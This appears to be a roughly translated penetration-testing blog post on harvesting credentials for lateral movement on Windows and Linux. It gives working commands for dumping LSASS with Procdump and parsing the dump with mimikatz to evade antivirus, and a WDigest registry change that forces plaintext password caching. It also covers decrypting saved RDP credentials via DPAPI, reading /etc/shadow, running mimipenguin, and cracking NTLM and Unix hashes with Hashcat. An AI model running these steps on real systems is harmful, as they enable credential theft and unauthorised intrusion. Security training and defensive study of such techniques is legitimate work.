Intranet lateral movement—Win&Linux&memory offline reading&Hashcat cracking&RDP&SSH storage extraction
1 Introduction
Regarding the SSH key issue, I originally wanted to summarize the SSH key cracking and lateral movement methods first, but there are too few online methods and uses for lateral movement in Linux systems, and I have not seen any good ones so far. Article, many questions do summarize relevant knowledge points, but it still feels a bit confusing, so I will pause the Linux lateral movement method first, and will not summarize the lateral movement in Linux for the time being.
However, we can still talk about lateral movement in Linux, because from a system perspective, there are really few available methods of lateral movement in Linux. Under normal circumstances, most Linux system utilization uses middleware software installed in the Linux system, etc. to achieve lateral movement.
2. Windows system password extraction
After the Windows Server 2012 system was included, in order to prevent the leakage of plain text passwords, Microsoft launched a patch KB2871997, which turned off the wdiges function. That is to say, when the system is Windows 10 and Windows server 2012 or above, plaintext passwords are not stored in the memory cache by default.
2.1. Online reading
In fact, online reading here means using the tools that come with CS to capture hashes and read plaintext passwords. However, you can see here that only the hash value can be read, not the plaintext password.
At the same time, you can see that all password positions are null, that is, empty. Is there really no password? In fact, it is due to the version problem of Windows server 2012 that the plain text cannot be read.
2.2. Offline reading
Generally speaking, if you use mimikatz, you will be killed. At this time, we can use Microsoft’s official tool to read it, mainly to prevent being killed when reading the password. Since this tool is a Microsoft tool, it can be avoided. Kill, not be killed.
2.2.1. Read without storage
The storage-free reading here is almost the same as above, that is, under normal reading conditions, the clear text password cannot be read.
2.2.1.1. Reading files
Here you first need to upload the tool to Windows server 2012 for running. How to export the run file and then use mimikatz to read it.
Procdump64.exe -accepteula -ma lsass.exe lsass.dmp
2.2.1.2. Local decryption
When the above command is executed, a file name will appear in the current directory: lsass.dmp. Of course, the name is written by myself, but the suffix is certain.
Here we run the local file, import the password, and read it. This avoids the risk of being killed. However, the clear text password cannot be read here, and the hash value is still read.
mimikatz.exe "sekurlsa::minidump lsass.dmp"
sekurlsa::logonPasswords full
2.2.2. Reading with storage
The operations of reading with storage and reading without storage are the same. The only difference is that the administrator needs to log in. Since when I demonstrated, I used DC, which is Windows server 2012, so I cannot use the activation administrator. Log in, so there is no demonstration.
Generally speaking, they are exactly the same. Here I put a picture of someone else.
2.3. Solve high version
I have always said that higher versions cannot read plain text passwords, so what should I do? In fact, this can be achieved by modifying the registry, and then forcing the screen to lock and waiting for the administrator to log in again with the account password.
2.3.1. Modify the registry
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1
2.3.2. Log in again
Here we lock the screen and then log in again, and then grab the password. You can see that the password has been successfully obtained.
2.4. HASH cracking
Of course, HASH passwords can also be cracked here.
2.4.1. Online cracking
Online cracking means cracking through some online websites, but some require money.
https://www.somd5.com/
https://www.cmd5.com/
2.4.2. Local cracking
Regarding local cracking, how should I put it, a very large codebook is required, and in some cases, powerful CPUs and GPUs are required for calculations.
Hashcat is a 可以tool for cracking passwords based on graphics card brute force. It supports almost all common encryptions and supports various password combinations. It comes with the tool and also supports
the platform.kali LinuxWindows Mac
Here we will briefly talk about usage. You can search online for specific usage, or write a special summary later! At the same time, please note that the download is still very slow even if I use a proxy, so I need to wait.
2.4.2.1. Dictionary cracking
Here you need to copy the hash value and prepare the pass code book. The main thing is to crack it based on the performance of the computer.
hashcat.exe -a 0 -m 1000 hash.txt pass.txt
2.4.2.2. Brute force cracking
Brute force cracking can be successfully cracked, but it requires ultra-high CPU and GPU calculations, especially some long and complex passwords. The following are password combinations.
-m 密文类型
-a 破解类型
?l 小写
?s 符号
?d 数字
Here we need to know how many digits the password is, whether the first digit is uppercase or lowercase, and whether the second digit is a number or letter. I always feel something is wrong. In actual combat, how do I know whether the first digit is a number, a letter, or uppercase or lowercase? There are many A combination.
For example, my admin@123 is completely ideal. It is written as follows:
hashcat.exe -a 3 -m 1000 579da618cfbfa85247acf1f800a280a4 ?l?l?l?l?l?s?d?d?d
If it is not allowed, just delete the password record tested above.
2.5. RDP credential capture
RDP has an option to save credentials. Under normal circumstances, some administrators will check the credentials for convenience.
2.5.1. View connection records
Here you can view the connection record through the command.
cmdkey /list
2.5.2. Find local Credentials
Record the value here.
dir /a %userprofile%\appdata\local\microsoft\credentials\*
2.5.3. Find the guidMasterKey value
Here you need to record the guidMasterKey value of the target's Credentials record, and the path in front of it must be your own path. Do not copy and paste directly, otherwise an error will occur.
mimikatz dpapi::cred /in:C:\Users\Administrator\appdata\local\microsoft\credentials\6090C0FC3FE42D73866869883B167718
2.5.4. Record MasterKey
Here you need to record the MasterKey corresponding to guidMasterKey.
mimikatz sekurlsa::dpapi
2.5.5. Decrypting tickets
Look carefully at the commands here, they need to be combined with each other.
mimikatz dpapi::cred /in:C:\Users\Administrator\appdata\local\microsoft\credentials\6090C0FC3FE42D73866869883B167718 /masterkey:8a5b068bf179d5617421dc04bd2b310d319badf9d79421e7c0a9bf685317f23b1f7be9666983ca3af76939256c2267ba0d4ab600962e4940fcf09be61d101c1d
3. Linux system password extraction
There are actually very few passwords for Linux systems in advance, and the success rate is also low.
3.1. Password reading
This may not be successful. Here I also had no response after running it.
chmod 755 ./mimipenguin.sh
./mimipenguin.sh
3.2. Password cracking
Password cracking is actually the same as the Windows password cracking above.
3.2.1. Determine password type
Here, the type is determined by looking at the root encryption. I really couldn't find what encryption my y is.
cat /etc/shadow
3.2.2. Cracking encryption form
linux sha512crypt $6$, SHA512 (Unix)加密方式:
hashcat -m 1800 sha512linux.txt p.txt
linux sha256crypt $5$, SHA256 (Unix)加密方式:
hashcat -m 7400 sha256linux.txt p.txt
linux下md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)加密方式:
hashcat -m 500 linuxmd5.txt p.txt
inux下bcrypt $2*$, Blowfish加密方式:
hashcat -m 3200 linuxmd5.txt p.txt
3.3. SSH keys
There is room for a summary at the end of the SSH key. Personally, I feel it is quite complicated and I am still understanding it.